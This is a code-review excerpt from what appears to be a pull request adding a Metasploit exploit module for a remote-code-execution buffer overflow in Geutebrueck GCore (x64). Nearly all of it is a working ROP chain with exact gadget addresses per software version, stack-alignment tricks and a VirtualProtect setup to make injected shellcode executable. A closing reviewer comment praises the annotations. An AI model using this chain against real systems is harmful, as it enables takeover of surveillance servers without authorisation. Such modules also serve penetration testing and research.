modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb

```diff
@@ -0,0 +1,285 @@
+
+        # 0x1400aa030    | POP R9; RET
+        # 0x1409AE1A8 is the .data section of gcore
+        rop += [0x1400aa030].pack('Q<')
+        rop += [0x1409AE1A8].pack('Q<')
+
+        # 0x140b5927a: xor rax, rax ; ret
+        rop += [0x140b5927a].pack('Q<')
+
+        # 0x1402ce220 pop rax ; ret
+        # 0x140d752b8 | VP Stub IAT Entry
+        rop += [0x1402ce220].pack('Q<')
+        rop += [0x140d752b8].pack('Q<')
+
+        # 0x1407c6b3b mov rax, qword [rax] ; ret  ;
+        rop += [0x1407c6b3b].pack('Q<')
+
+        # 0x140989c41 push rax; ret
+        rop += [0x140989c41].pack('Q<')
+
+        # 0x1406d684d jmp rsp
+        rop += [0x1406d684d].pack('Q<')
+
+        [rop, overwrite, stack_align]
+
+      elsif target.name.include? '1.4.2.37'
+        print_status('Preparing ROP chain for target 1.4.2.37!')
+
+        # 0x140cd9759 | add rsp, 0x10 ; ret
+        # This is needed because the next 16 bytes are sometimes messed up.
+        overwrite = [0x140cd9759].pack('Q<')
+
+        # These bytes "\x43" are sacrificed ; we align the stack to jump over this.
+        stack_align = "\x43" * 16
+
+        # We have 40 bytes left to align our stack!
+        # The most reliable way to align our stack is to save the value of rsp in another register, do some calculations
+        # and to restore it.
+        # We save RSP to RDX. Even if we use ESP/EDX registers in the instruction, it still works because the values are small enough.
+
+        # 0x1404f213f: mov edx, esp ; ret
+        stack_align += [0x1404f213f].pack('Q<')
+
+        # As no useful "sub rdx, xxx" or "sub rsp, xxx" gadget were found, we use the add instruction with a negative value.
+        # We pop -XXXXX as \xxxxxxxxx to rax
+        # 0x14000efa8  pop rax ; ret
+        stack_align += [0x14000efa8].pack('Q<')
+        stack_align += [0xFFFFFFFFFFFFF061].pack('Q<')
+
+        # Our value is enough.
+        # 0x140cdfe65  | add rax,rdx ; ret
+        stack_align += [0x140cdfe65].pack('Q<')
+
+        # RSP gets restored with the new value. The return instruction doesn't break our ropchain and continues -XXXXX back.
+        # 0x140cf3110 | mov rsp, rax ; ..... ; ret
+        stack_align += [0x140cf3110].pack('Q<')
+
+        # Virtualprotect Call for 64 Bit calling convention. Needs RCX, RDX, R8 and R9.
+        # We want RCX to hold the value for VP Argument "Address of Shellcode"
+        # 0x140ccb984 |  mov rcx, rax ; mov rax, qword [rcx+0x00000108] ; add rsp, 0x28 ; ret  ;
+        rop = ''
+        rop += [0x140ccb984].pack('Q<')
+        rop += [0x4141414141414141].pack('Q<') * 5 # needed because of the stack aliging with "add rsp, 0x28" ;
+        # 0x14008f7ec      | POP RDX; RETN
+        # 0x...1000        | Value for VP "Size of Memory"
+        rop += [0x14008f7ec].pack('Q<')
+        rop += [0x0000000000000400].pack('Q<')
+
+        # 0x140a88f81:   | POP R8; RET
+        # 0x...40        | Value for VP "Execute Permissions"
```

Comment:
Just wanted to say that I appreciate all the comments you've put in here explaining each thing.  Very nice!